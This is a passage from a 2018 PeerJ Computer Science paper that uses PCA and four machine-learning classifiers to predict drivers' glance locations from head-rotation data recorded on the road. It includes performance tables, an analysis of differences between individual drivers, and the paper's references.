Sarkar & A Plummer, 2014, unpublished data) prepared by VTTI for the SHRP 2 program. Participants were initially recruited to ensure that the dataset represented a wide array of facial geometry. Participants who met the study’s eligibility criteria were assigned to participate in either static trials (e.g., data collected while not driving) or dynamic trials (e.g., data collected while driving). A total of 44 participants were available (22 participants for static trials and 22 participants for dynamic trials). The sample spans four age groups (18–35, 36–50, 51–65, and over 66, with a majority of cases falling in the first two groups) and consisted of 30 males and 14 females. Data were collected in a 2001 Saab 9-3 instrumented with a data acquisition system to collect a number of metrics, including digital video of the driver’s face. The video was recorded by a camera mounted below the rearview mirror. A previous brief report from our group (Muñoz et al., 2015) showed a number of differences in the distributions of head rotations associated with glances to the road and center cluster between the static and dynamic samples. Consequently, the data from the 22 participants from the dynamic trials make up the focus of this analysis since actual on-road behavior is our primary interest. Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 3/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 Test trials The dynamic trials were conducted on a predefined route around Blacksburg, Virginia. This route was approximately 15 miles in length and consisted of various road types (e.g., two lane road, residential, rural, and divided highway). During the driving session, which usually lasted between 60 to 90 min, participants were instructed to perform five basic tasks, each of which was performed once: (a) report current vehicle speed, (b) indicate if any vehicles are immediately adjacent to the test vehicle, (c) turn the radio on and then off, (d) locate the cell phone in the center console, and (e) complete a brief simulated cell phone conversation. Participants were accompanied by an in-vehicle experimenter who instructed participants to conduct each of the tasks at a safe time at roughly the same location on the route. Data reduction Video of each task/glance was recorded at 15 frames per second and decomposed into frames for analysis. Each video frame was annotated by two independent analysts who labeled seven predefined facial landmarks: (a) outer corner of the participant’s right eye, (b) inner corner of the participant’s right eye, (c) outer corner of the participant’s left eye, (d) inner corner of the participant’s left eye, (e) the tip of the participant’s nose, (f) the right corner of the participant’s mouth, and (g) the left corner of the participant’s mouth. Two analysts’ x and y pixel coordinates for each landmark were averaged, and if the average frame pixel correction exceeded 3.5 pixels, the frame was considered as a significant disagreement between two analysts, and was excluded from the rotation estimate dataset. If either analyst could not make a reliable annotation, the landmark was marked as ‘‘missing,’’ and the frame was excluded from the rotation estimate dataset. For each video frame, geometric methods (e.g., Murphy-Chutorian & Trivedi, 2009; Gee & Cipolla, 1994; Horprasert, Yacoob & Davis, 1996), which utilize feature locations (e.g., eyes, mouth, and nose tip), configurations of the facial features, basic ratios between feature locations (e.g., ratio between binocular width and vertical distance from lit to midpoint between eyes), etc. were used for head rotation estimation. The head pose data consisted of three rotation estimates (i.e., X, Y and Z rotation). Figure 1 shows a rotation coordinate system. Glance locations were coded by trained video analysts on a frame-by-frame basis into one of 16 locations: forward, left forward, right forward, rearview mirror, left window/mirror, right window/mirror, over-the-shoulder, instrument cluster, center stack, cell phone, interior object, passenger, no eyes visible—glance location unknown, no eyes visible—eyes are off-road, eyes closed, and other (e.g., any glance that cannot be categorized using the above codes). Figure 2 shows 10 of the 16 glance locations. A senior analyst reviewed the output of the coding and provided feedback to the less-experienced analyst. Glance allocations for each subject and task were merged with head rotation data using timestamps. Model training and validation Training data were derived from the dataset by taking all data belonging to a randomly sampled subset of the subjects (80%). The data from the remaining subjects (20%) were used to build a validation dataset. As one of the tested classifiers (the Hidden Markov Model), Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 4/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 Figure 1 Head rotation coordinate system. (A) Rotation X: Pitch, (B) Rotation Y : Yaw, and (C) Rota- tion Z: Roll. Full-size DOI: 10.7717/peerjcs.146/fig-1 Figure 2 Glance locations for the manual coding. Full-size DOI: 10.7717/peerjcs.146/fig-2 takes the temporal structure of the input data into account, the timestamp ordering of the samples for each subject were maintained. All rotation variables were normalized by computing their individual z-scores per participant. The performance measures reported in the result section were computed using this normalization method. Furthermore, to discount any potential bias inherent in how subjects are sampled, a Monte-Carlo sampling Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 5/19 https://peerj.com https://doi.org/10.7717/peerjcs.146/fig-1 https://doi.org/10.7717/peerjcs.146/fig-2 http://dx.doi.org/10.7717/peerj-cs.146 technique was used (Muñoz et al., 2015; Muñoz et al., 2016). For each of 50 iterations of this sampling approach, training and validation test sets were generated as above. All models were trained, and performance values were then computed for each classifier as the mean of each performance metric (standard accuracy, F1 score, and Kappa value) over all iterations. One key issue considered is the unbalanced class structure (i.e., skewness) of the dataset, as glances to the forward roadway heavily outnumber glances to any other single location within the vehicle. For instance, out of all the glances to the forward roadway and center stack, approximately 95% belong to the former class (the forward roadway). Random subsampling was used to prune away the over-represented glance locations in the data. Data exploration The intrinsic discriminative quality of the data plays a crucial role in any classification framework (i.e., classification may be difficult in datasets in which classes overlap strongly in feature space). Therefore, PCA (Jolliffe, 2005) was applied for representing the raw data in terms of its underlying structural patterns, computing the covariance matrix across all variables, and extracting the eigenvectors of this matrix. Given this information, which characterizes how statistical variance is distributed amongst (linear) combinations of variables, this analysis can identify and visualize properties that might have an impact on classification performance, in particular which variables are most likely to contribute to a high classification accuracy. As explained in ‘Principal component analysis’, in this context we use PCA to reduce the dimensionality of the data from three dimensions (rotations in X,Y ,Z axes) to two dimensions and to examine which linear combinations of these rotations contribute most towards discriminating between glances to the center stack and forward roadway/right mirror. Model development The classification methods presented in this paper are (a) k-Nearest Neighbor, (b) Random Forest, (c) Multilayer Perceptron, and (d) Hidden Markov Models. Implementations for all but the latter were taken from OpenCVC++ library v.2.4.1, using default parameter settings unless otherwise noted. The HMM implementation was taken from MATLAB (2014). The parameters of each model were determined empirically with an experimental validation set (i.e., a random subset of the larger data pool). These methods were chosen based on the trade-off in running time, space complexity, and difficulty of parameter tuning. The k-Nearest Neighbor (kNN) algorithm has the lowest number of parameters (k, the number of neighbors to consider, and the distance metric to evaluate between points) and arguably the highest space and running time complexity requirements during evaluation, but is very fast during training. The Random Forest classifier (Breiman, 2001) is a representative ensemble method with high space complexity requirements both for training and evaluation, but unlike kNN it is both fast to train and fast to evaluate. Random forest uses a random subset of each input sample at different nodes to train sets of weak learners. This has the added benefit that as training progresses, variables with low information content are automatically filtered out, thus making the classifier especially Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 6/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 well-suited for data structured across heterogeneous input variables. The main parameters that require tuning are the number trees in the forest, the depth of the trees (usually kept constant across all trees), and the function used to split nodes of each tree. The Multilayer Perceptron (MLP) was taken as a representative of the larger class of Artificial Neural Networks (ANN) for their ability to model non-linear relationships between data points. MLP space complexity is low for both training and evaluation, while running time is slow for training and fast for evaluation. The basic parameters that require tuning here are the number of hidden layers and the number of neurons in each layer. Hidden Markov Models (HMMs) (Rabiner & Juang, 1986) are employed to test how much of the classification signal lies in the temporal structure of the data. Sequences of head rotation and glance duration features are fed to the classifier, which then infers a single class label for the sequence of samples. Glance duration features are computed from glance allocations as the timestamp difference between adjacent glances in time and inform the classifier about how long each glance is (see Muñoz et al., 2016 for further details). As in the classical approach, one HMM is built from data from each class (glance location). The class label of an unobserved sequence is then determined by finding the HMM and its corresponding class that maximizes the log probability of the test sequence. Practically speaking, the only elemental parameter of an HMM is the number of hidden states used to model the temporal data. Muñoz et al. (2015) provides additional detail as to how the parameters for each model were set. Model performance measures Generally, a sample corresponds to a single 3-tuple of X,Y , and Z rotations. This is the case for all classifiers except the HMM, which understands a sample as a sequence (in time) of these tuples. For the purpose of this study, these tuples we grouped according to subject, task, and glance location, ordered according to increasing time, and labeled with the label of the glance location used in the grouping. Classification then proceeded as in Muñoz et al. (2015). To assess performances of the classifiers, the following three performance measures were used in a binary classification framework (center stack vs. forward roadway, and center stack vs. right mirror). The reason for introducing multiple measures at this stage is to get a fair estimate of classifier performance in light of heavily skewed classes in the dataset (i.e., glances to the forward roadway have a much higher presence in the data than any other class): 1. Classification accuracy (AC) (e.g., Sokolova & Lapalme, 2009): the percentage of correctly classified samples (or sample sequences for the HMM classifier): Classification Accuracy= Number of correctly labeled samples Total number of samples 2. F1-score (FS) (e.g., Sokolova & Lapalme, 2009): a measure of how well the classifier was able to distinguish between classes given an unbalanced dataset. F1 score= 2×(Positive predictive value×Sensitivity) Positive predictive value+Sensitivity Positive predictive value= Number of true positives Number of true positives+Number of false positives Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 7/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 Sensitivity= Number of true positives Number of true positives+Number of false negatives 3. Cohen’s Kappa statistic (KP) (e.g., Carletta, 1996): a measure indicating how well a classifier agrees with a perfect predictor (higher values indicate high agreement). Cohen’s Kappa= P (A)−P(E) 1−P(E) P(A) = Relative observed agreement between model and perfect predictor (i.e., accuracy) P(E)= Probablity of chance agreement between model and perfect predictor. RESULTS To answer the key questions outlined: (a) PCA was applied to the driving data (see ‘Test trials’ and ‘Model performance measures’) as a method of quantifying the contributions of each head angle (X, Y and Z) in their ability to discriminate between glance locations (this study looks at forward vs. center stack, center stack vs. right mirror), (b) several predictive models (‘Model development’) were tested (‘Model performance measures’) for predicting glance location based on head position while driving and their accuracies compared, and (c) individual differences in head-glance correspondence during driving were addressed. Principal component analysis The input to the PCA stage are the filtered X, Y and Z rotation variables. No additional signal filtering was applied beyond the original Butterworth filter used by the VTTI in the creation of the dataset. PCA was used to reinterpret the X, Y and Z filtered rotation variables along two independent (orthogonal) axes, i.e., the first two principal components. Figure 3A interprets the dynamic 2-class data (center stack vs. forward) as PCA scores. Each point on the graph corresponds to a single sample from the original dataset, irrespective of participant or task (but limited to glances to the center stack and forward roadway). Each axis of the graph corresponds to the noted principal component and illustrates the statistical behavior of the data along that component. Although the input data were standardized per participant, the values plotted have been de-normalized to aid interpretation: they therefore have magnitudes in the range of actual rotations. Figures 3A and 4A show the data along only the first two components of the PCA decomposition. The distribution of individual data points and their class correspondence in Fig. 3A was compared with the actual principal component values in Fig. 3B to establish an informal overview of which variables are most likely to contribute to the classification effort. A rough clustering of forward glances may be observed in Fig. 3A. This cluster center lies at moderate to high values of Principal Component 1 (PC1). Figure 3B reveals that PC1 increases in magnitude with increasing X and Y rotation, both of which load highly on this component. In this instance, a linear combination of X and Y rotation gives a rough but not clear cut decision boundary between glances to the center stack and glances to the forward roadway. PCA Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 8/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 −50 −25 0 25 −25 0 25 50 PC1 P C 2 Glance location Center stack Forward (a) 0.74 −0.36 −0.02 0.67 0.42 0.16 −0.09 −0.08 0.99 X Y Z 1 2 3 Principal component R ot at io n 0.0 0.5 value (b) Figure 3 Principal component analysis (PCA) of dynamic data, using head rotation. (A) Glances to the center stack and forward roadway. (B) Principal components of head rotation X, Y and Z for all data samples belonging to the center stack and forward roadway class. Full-size DOI: 10.7717/peerjcs.146/fig-3 decomposition reveals that PC1, which may be interpreted as a linear mix of X and Y rotation, explains 66.5% of the variance of the dataset, while PC2 explains only 26.4% of the variance. Lastly, PC3 (which due to the high loading factor of Z rotation on this component may effectively be interpreted as the measure of the influence of Z rotation) contributes only 7.1% of the total variance. The same analysis was made for the center stack vs. right mirror case. Figure 4 provides a two-dimensional sample distribution plot as well as the corresponding principal components. Figure 4A shows a nice separation of right mirror points, which are located towards on the bottom right quadrant of the scatter plot. Figure 4B reveals that X and Y rotation load highly on PC1, i.e., PC1 increases with increasing X and Y rotation, which makes sense intuitively. On the PC2 axis, the right mirror points are in negative PC2 space. Looking at Fig. 4B, we see that PC2 increases with increasing Y rotation and decreases with decreasing X rotation. Likewise, each component accounts for roughly the same amount of variance as in the center stack vs. forward roadway case above. We can therefore conclude that in order to distinguish glances to the forward roadway from glances the right mirror, it (a). Suffices to look at X and Y rotation, and (b). Right mirror points are highly correlated with high Y rotation (which loads heavily and positively on PC1 but negatively on PC2), but only for certain ranges of X rotation (which loads heavily and positively on both PC1 and PC2). Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 9/19 https://peerj.com https://doi.org/10.7717/peerjcs.146/fig-3 http://dx.doi.org/10.7717/peerj-cs.146 −20 0 20 40 −25 0 25 50 PC1 P C 2 Glance location Right mirror Forward (a) 0.69 0.25 −0.02 0.71 −0.2 0.12 −0.07 0.03 0.99 X Y Z 1 2 3 Principal component R ot at io n 0.00 0.25 0.50 0.75 value (b) Figure 4 Principal component analysis (PCA) of dynamic data, using head rotation. (A) Glances to the right mirror and forward roadway. (B) Principal components of head rotation X,Y , and Z for all data samples belonging to the center stack and right mirror class. Full-size DOI: 10.7717/peerjcs.146/fig-4 Model validation Table 1 presents the performance measures for all four classifiers using the two representations of the data (balanced vs. unbalanced) for the forward vs. center stack case. As noted earlier, Monte-Carlo sampling (50 iterations) was applied for deriving training and test sets. Using the balanced dataset that removed glance distribution bias during training leads to a higher performance in terms of sensitivity/specificity (F1 scores all ≥ 0.68) and prediction quality (Kappa all ≥ 0.41) of each classifier compared to (F1 scores all ≥ 0.04) and (Kappa all ≥−0.07) for the original unbalanced data. The HMM classifies sample sequences corresponding to blocks of data within a subject, task, and glance location group. Across all classifier, the relatively strong model performances may indicate that the temporal structure of head rotation features can be potential information source. Though all classifiers using the balanced dataset outperform a chance predictor, there is a clear upper bound on how much these features contribute to classification. In addition, other locations within the vehicle were also tested against glances to the forward roadway in order to examine the relationship between classification accuracy and the visual angle of the target. HMM and Random Forest models, which showed relatively higher accuracy among other classifiers, were selected and tested. Table 2 places the previous center stack classification efforts in this context and gives performance measures for the two classifiers with the overall best performance. As expected, a rough correlation between increasing visual angle and classification accuracy may be observed, reaching up Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 10/19 https://peerj.com https://doi.org/10.7717/peerjcs.146/fig-4 http://dx.doi.org/10.7717/peerj-cs.146 Table 1 Performance measures (AC, accuracy; FS, F1 score; KP, Kappa statistic) across all classifiers and class distributions for dynamic data, forward roadway vs. center stack. Original dataset Balanced dataset AC FS KP AC FS KP k-nearest neighbor 0.93 0.19 0.16 0.80 0.80 0.59 Random forest 0.86 0.30 0.24 0.79 0.78 0.59 Multilayer perceptron 0.78 0.29 0.22 0.80 0.82 0.59 Hidden Markov model 0.84 0.28 0.22 0.83 0.68 0.57 Table 2 Performance measures (AC, accuracy; FS, F1 score; KP, Kappa statistic) across class distribu- tions for the Random Forest and HMM classifiers for dynamic data, forward roadway vs. instrument cluster, vs. left mirror, vs. center stack, vs. right mirror. Forward vs. Model Original dataset Balanced Dataset AC FS KP AC FS KP Instrument cluster Random forest 0.59 0.33 0.08 0.56 0.48 0.11 Instrument cluster Hidden Markov Model 0.66 0.32 0.12 0.66 0.61 0.33 Left mirror Random forest 0.86 0.30 0.24 0.79 0.78 0.59 Left mirror Hidden Markov Model 0.84 0.28 0.22 0.83 0.68 0.33 Center stack Random forest 0.85 0.77 0.66 0.83 0.81 0.66 Center stack Hidden Markov Model 0.83 0.72 0.60 0.85 0.83 0.69 Right mirror Random forest 0.95 0.74 0.72 0.90 0.89 0.80 Right mirror Hidden Markov Model 0.93 0.69 0.65 0.87 0.73 0.66 to 90% classification rate with a balanced dataset. The results may support that head pose data can detect particularly detrimental glances (i.e., high-eccentricity glances) with high accuracy, whereas using head pose data alone does not provide high accuracy to detect low-eccentricity glances. Individual differences in head-glance correspondence Individual differences in head-glance correspondence were also tested. To minimize potential variability from characteristics of tasks, only the radio task (e.g., ‘‘Turn the radio on and then off’’), which required glances to the center stack from the dynamic setting, was selected and analyzed. Figure 5 illustrates the distribution of 21 participants’ individual Y rotation while glancing to the center stack during the radio tasks (there was one subject who did not glance to the center stack and that case was excluded for the subsequent analysis). As can be observed in Fig. 5, a wide range of Y rotations exists while glancing to the center stack across the subject pool, with some subjects showing relatively narrow distributions and others showing wide distributions (note that individual dots in Fig. 5 visualize corresponding Y rotation values while glancing to the center stack). It is also important to observe that the center point of each subject’s distribution varies even they are looking at the same object in space. To further explore the differences in rotation distributions in glances to the center stack in relation to glances to the forward roadway, Y rotations were plotted over time while completing the radio task (see Fig. 6) for an illustrative sample of three subjects. This figure Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 11/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 206 207 208 211 217 222 223 225 231 233 236 242 244 248 250 252 253 255 262 267 268 −30 −20 −10 0 Head rotation Y S ub je ct ID Figure 5 Comparison of individual distribution of Y rotation while glancing to the center stack dur- ing the radio task (note that one participant did not have any glances to the center stack, so this figure only shows 21 participants’ data). Full-size DOI: 10.7717/peerjcs.146/fig-5 visualizes how drivers horizontally rotate (e.g., Y rotation) their head while engaging in the radio task and their glance locations over time (differentiated in colors). The top frame of Fig. 6 illustrates a profile that has relatively narrow range of Y rotation while glancing to the center stack, and (relatively) limited overlap between the ranges of Y rotation corresponding to glances to forward and glances to the center stack. The middle frame of Fig. 6 illustrates a profile that covers a wider range of Y rotation with significant overlap of the two glance locations. Finally, the lower frame illustrates a profile with a narrow range of Y rotation with a sizable overlap between the glance locations. Based on these exploratory findings, it was assumed that individual difference in head-glance correspondence may exist. Figure 7 shows 21 subjects on two dimensions: (a) the mean difference of Y rotation between glances to forward and to the center stack, and (b) the range of Y rotation (i.e., distribution width of rotation Y while glancing to the center stack). The result showed that the two dimensions were positively correlated, r(19)= .73, p < .001, indicating that subjects who showed wider ranges of horizontal head rotations tended to have higher mean differences of rotation Y while glancing to forward and the center stack. For example, subjects 244 and 225 showed relatively narrow ranges of horizontal head rotations (less than 10 degrees) while glancing to the center and their mean rotation angles for glancing to the center stack were relatively close to their mean rotation angles for glancing to forward (the mean differences were 1.05 degrees for subject 244 and 2.16 degrees for subject 225). This may indicate that subjects on the left-bottom area in Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 12/19 https://peerj.com https://doi.org/10.7717/peerjcs.146/fig-5 http://dx.doi.org/10.7717/peerj-cs.146 Figure 6 Illustration of three subjects’ Y rotation ((A) Subject 231, (B) Subject 250, and (C) Subject 244) over time during dynamic radio tasks (note: line color represents glance locations). Full-size DOI: 10.7717/peerjcs.146/fig-6 Fig. 7 such as subject 244 and 225 (i.e., narrow width and small mean difference) moved their head less actively to glance to the center stack, whereas subjects on the right-top are actively moved their head to glance to the center stack location. DISCUSSION This analysis investigated the relationship between head rotation and glance behavior during on-road driving. Various machine learning techniques were employed to examine the predictive value of head rotation for glance location at an individual level. In this particular example, we used PCA not specifically as a data reduction method (we only had three variables to begin with), but as a method to assess variable importance in the classification. We could clearly see how variances in X and Y rotation spread heavily across Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 13/19 https://peerj.com https://doi.org/10.7717/peerjcs.146/fig-6 http://dx.doi.org/10.7717/peerj-cs.146 206 207 208 211 217 222 223 225 231 233 236 242 244 248 250 252 253 255 262 267 268 5 10 15 20 5 10 15 Mean difference of rotation Y between glances to forward and to the center stack D is tri bu tio n w id th o f r ot at io n Y w hi le g la nc in g to th e ce nt er s ta ck Figure 7 Drivers’ head angle profiles while glancing to the center stack during the radio tasks (note: numbers represent subject ID). Full-size DOI: 10.7717/peerjcs.146/fig-7 the first two components, i.e., in order to distinguish right mirror from forward glances it suffices to use a linear decision boundary on the first two components (this is evident from Fig. 3). That is, both vertical and horizontal head rotations are key variables to classify glance locations in this scenario, as expected. In a more general case, especially when the input data is highly dimensional, the outcome from PCA can inform what features to move forward with in any subsequent classification or regression task. For this particular scenario, it provides a step-up from working with the raw rotation values in two ways: 1. PCA provides an accurate 2D representation of this three dimensional problem, ironing out any inherent correlations between the X,Y ,Z rotation variables in the process. 2. By demonstrating to what extent each rotation variable loads on each axis of this representation, and knowing beforehand how the samples in this representation map to glance locations (classes) in our classification framework, it can be easily shown which rotations or combinations thereof are likely to be of most help for a classifier trained to discriminate between these classes. A total of four classifiers from a wide range of data interpretation techniques were used to detect patterns in head rotation data. Both unbalanced raw data, which included more cases of glancing forward than glancing to the center stack, and balanced data were tested. Substantial performance gains were observed when using the balanced training dataset. For the forward roadway vs. center stack case, Hidden Markov Models performed the best with an accuracy of 83%. When comparing this number to the remaining accuracy values it should be remembered that different ratios are expressed—HMMs work with sequences of point samples as inputs, while the remaining classifiers work with point Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 14/19 https://peerj.com https://doi.org/10.7717/peerjcs.146/fig-7 http://dx.doi.org/10.7717/peerj-cs.146 samples directly. All of the modeling approaches provided results that were well in excess of chance findings, suggesting that head rotation data is a fairly robust predictive signal. Given that the limited number of glances to non-forward locations (i.e., glances to the center stack accounted for less than 5% of the total glances recorded) were captured during short/simple secondary tasks, model performance may be best considered as relative lower bound on the possible predictive quality for driver gaze detection. This study also looked at the variability in classification accuracy with increasing visual angles to show a significant correlation between the accuracy and visual angles. There may be multiple factors that influence drivers’ head-glance correspondence such as: (a) road environment (e.g., highway driving vs. rural driving), (b) secondary-task characteristics (e.g., tasks require long off-road glances from drivers vs. tasks require short off-road glances), (c) individual strategies for interacting with secondary tasks (e.g., fixing a head to forward while glancing to the center stack), and (d) physical constraints. For this reason, we analyzed only one type of the secondary tasks (i.e., the radio task) for testing individual differences (note that only this analysis subsampled data for one task and other analyses used the entire dataset including all tasks). The result showed that individual differences in head-glance correspondence may exist. It is well known that owls have to turn their entire head to change views as their eyes are fixed in their sockets, whereas some lizards (such as Chameleons) have very large angles of eye movement. We also found lizard type drivers (e.g., subject 244 and 225 in Fig. 7) and owl type drivers (e.g., subject 223 and 236 in Fig. 7), and it was expected that head pose data could predict glance regions with higher accuracy for the owl type drivers who actively move heads while glancing away from the road. This result suggests the need for a user-specific model (e.g., training a classifier for each individual to detect glances away from the road by using head rotation) or additional input features (i.e., other facial features or pupil location) to increase model performance, especially for the lizard type drivers (who barely move their head while glancing away from the road). Also, predictive power of head rotation data for specific types of glances, such as longer off-road glances which have been linked to greater risk of collision (Victor et al., 2015), needs to be considered further. Furthermore, efforts should assess the predictive power of head rotation data for certain types of glances such as those that are of longer duration, which have been linked to greater risk of collision (Victor et al., 2015). One limitation of this work was that the analysis was only applied to the meidated and reduced data, given the fact that the present study conducted a secondary analysis of a subset of the original data. Therefore, it should be acknowledged that these findings might not be extrapolated to other circumstances such as a situation where estimation of head orientation is extremely challenging. Also, the present work focused on visual angle and classification accuracy between two objects, and individual differences in head and glance correspondence, regardless of task. However, as a previous study (Land & Tatler, 2001) revealed, drivers’ head movement and rotation pattern can be task-specific (e.g., racing). Therefore, further studies which expend to task characteristics (both primary and secondary tasks), will need to be undertaken for a deeper understanding of drivers’ head and glance correspondence. Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 15/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 CONCLUSION The present study investigated head pose data to test the feasibility of using head pose to predict glance location, and served as an exploratory base for developing approaches to building semi-automated glance annotation systems (Fridman et al., 2016a; Fridman et al., 2016b). This study also systematically tested factors that may affect model performance (e.g., data structure, visual angles between two glance locations, and individual differences in head-glance correspondence). This study achieved fairly accurate classification performance (e.g., classifying glances to forward vs. glances to the center stack), and supports the feasibility of detecting drivers’ glances away from the road by not using eye-tracking data. Especially, head pose data accurately classified glances to farther regions (i.e., high-eccentricity glances) from the center forward region. It can therefore be assumed that although classification accuracy for low-eccentricity glances is lower compared to the accuracy of high-eccentricity glances, the most detrimental glance regions (such as a center stack where the most current infotainment system are installed) can be detected by using head pose data. This work suggests that individual differences in head-glance correspondence may be separated into two classes and stimulated follow-on work that has been developed in Fridman et al. (2016b). However, from the data that is available, it is not clear if an individual can be ‘‘assigned’’ to one of the two classes (i.e., ‘‘owl’’ or ‘‘lizard’’), or if there are more factors such as roadway conditions, secondary type interacting with some individual propensity for certain movement patterns. This study used manually coded on-road data, which are relatively more valid and reliable than automatically tracked eye/head data from a driving simulator. Overall, this work suggests that head rotation data, a feature that may be recorded in the vehicle with limited sophistication using commercially available sensors, may provide a potentially lower cost and higher quality estimate of attention allocation than eye tracking data. Head movements may be used to fairly reliably predict safety critical off-road glances to regions in the vehicle frequently associated with in-vehicle distractions. ACKNOWLEDGEMENTS An earlier paper covering a portion of this work (Muñoz et al., 2015) appeared in the proceedings of the 8th International Driving Symposium on Human Factors in Driver Assessment, Training, and Vehicle Design. Authors would like to acknowledge the contribution of Shannon Roberts who provided valuable comments on this manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding Support for this work was provided by the US DOT’s Region I New England University Transportation Center at MIT, The Santos Family Foundation and the Toyota Class Action Settlement Safety Research and Education Program. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 16/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146 Grant Disclosures The following grant information was disclosed by the authors: US DOT’s Region I New England University Transportation Center at MIT. The Santos Family Foundation. Toyota Class Action Settlement Safety Research and Education Program. Competing Interests Trent Victor is an employee of Volvo Cars and SAFER Vehicle and Traffic Safety Center. Author Contributions • Joonbum Lee analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Mauricio Muñoz analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • Lex Fridman analyzed the data, wrote the paper, performed the computation work, reviewed drafts of the paper. • Trent Victor, Bryan Reimer and Bruce Mehler wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data has been supplied as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.146#supplemental-information. REFERENCES Ahlstrom C, Victor T, Wege C, Steinmetz E. 2012. Processing of eye/head-tracking data in large-scale naturalistic driving data sets. IEEE Transactions on Intelligent Transportation Systems 13(2):553–564 DOI 10.1109/TITS.2011.2174786. Breiman L. 2001. Random forest. Machine Learning 45(1):5–32 DOI 10.1023/A:1010933404324. Carletta J. 1996. Assessing agreement on classification tasks: the kappa statistic. Compu- tational Linguistics 22(2):249–254. Driver Focus-Telematics Working Group. 2006. Statement of principles, criteria, and verification procedures on driver-interactions with advanced in-vehicle information and communication systems. Washington, D.C.: Alliance of Automobile Manufactures. Fridman L, Langhans P, Lee J, Reimer B. 2016a. Driver gaze region estimation without use of eye movement. IEEE Intelligent Systems 31(3):49–56. Fridman L, Lee J, Reimer B, Victor T. 2016b. ‘Owl’and ‘Lizard’: patterns of head pose and eye pose in driver gaze classification. IET Computer Vision 10(4):308–313 DOI 10.1049/iet-cvi.2015.0296. Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 17/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.146#supplemental-information http://dx.doi.org/10.7717/peerj-cs.146#supplemental-information http://dx.doi.org/10.7717/peerj-cs.146#supplemental-information http://dx.doi.org/10.1109/TITS.2011.2174786 http://dx.doi.org/10.1023/A:1010933404324 http://dx.doi.org/10.1049/iet-cvi.2015.0296 http://dx.doi.org/10.7717/peerj-cs.146 Gee A, Cipolla R. 1994. Determining the gaze of faces in images. Image and Vision Computing 12(10):639–647 DOI 10.1016/0262-8856(94)90039-6. Horprasert T, Yacoob Y, Davis LS. 1996. Computing 3-D head orientation from a monocular image sequence. In: Proceedings of the second international conference on automatic face and gesture recognition, 242–247. Jolliffe I. 2005. Principal component analysis. Hoboken: John Wiley & Sons, Ltd. Land MF, Tatler BW. 2001. Steering with the head: the visual strategy of a racing driver. Current Biology 11:1215–1220 DOI 10.1016/S0960-9822(01)00351-7. Li N, Busso C. 2016. Detecting drivers’ mirror-checking actions and its application to maneuver and secondary task recognition. IEEE Transactions on Intelligent Transportation Systems 17(4):980–992 DOI 10.1109/TITS.2015.2493451. Liang Y, Lee JD, Yekhshatyan L. 2012. How dangerous is looking away from the road? Algorithms predict crash risk from glance patterns in naturalistic driving. Human Factors: The Journal of the Human Factors and Ergonomics Society 54(6):1104–1116. MATLAB. 2014. Statistics and machine learning toolbox. Natick: The MathWorks, Inc. Available at https://www.mathworks.com/products/statistics.html. Muñoz M, Lee J, Reimer B, Mehler B, Victor T. 2015. Analysis of drivers’ head and eye movement correspondence: predicting drivers’ glance location using head rotation data. In: Proceedings of the 8th international driving symposium on human factors in driver assessment, training, and vehicle design. Snowbird, UT. Muñoz M, Reimer B, Lee J, Mehler B, Fridman L. 2016. Distinguishing patterns in drivers’ visual attention allocation using Hidden Markov Models. Transportation Research Part F: Traffic Psychology and Behaviour 43:90–103 DOI 10.1016/j.trf.2016.09.015. Murphy-Chutorian E, Trivedi MM. 2009. Head pose estimation in computer vi- sion: a survey. IEEE Transactions on Pattern Analysis and Machine Intelligence 31(4):607–626 DOI 10.1109/TPAMI.2008.106. National Highway Traffic Safety Administration. 2015. Distracted driving. Available at https://www.nhtsa.gov/risky-driving/distracted-driving (accessed on 2017). Rabiner L, Juang BH. 1986. An introduction to hidden Markov models. AASP Magazine, IEEE 3(1):4–16 DOI 10.1109/MASSP.1986.1165381. Sodhi M, Reimer B, Llamazares I. 2002. Glance analysis of driver eye movements to evaluate distraction. Behavior Research Methods, Instruments, & Computers 34(4):529–538 DOI 10.3758/BF03195482. Sokolova M, Lapalme G. 2009. A systematic analysis of performance measures for classification tasks. Information Processing & Management 45(4):427–437 DOI 10.1016/j.ipm.2009.03.002. Statistic Brain. 2017. Car crash fatality statistics 2016. Available at https://www. statisticbrain.com/car-crash-fatality-statistics-2016/ (accessed on 2017). Talamonti WJ, Huang W, Tijerina L, Kochhar D. 2013. Eye glance and head turn correspondence during secondary task performance in simulator driving. In: Proceedings of the human factors and ergonomics society annual meeting, 1968–1972. Lee et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.146 18/19 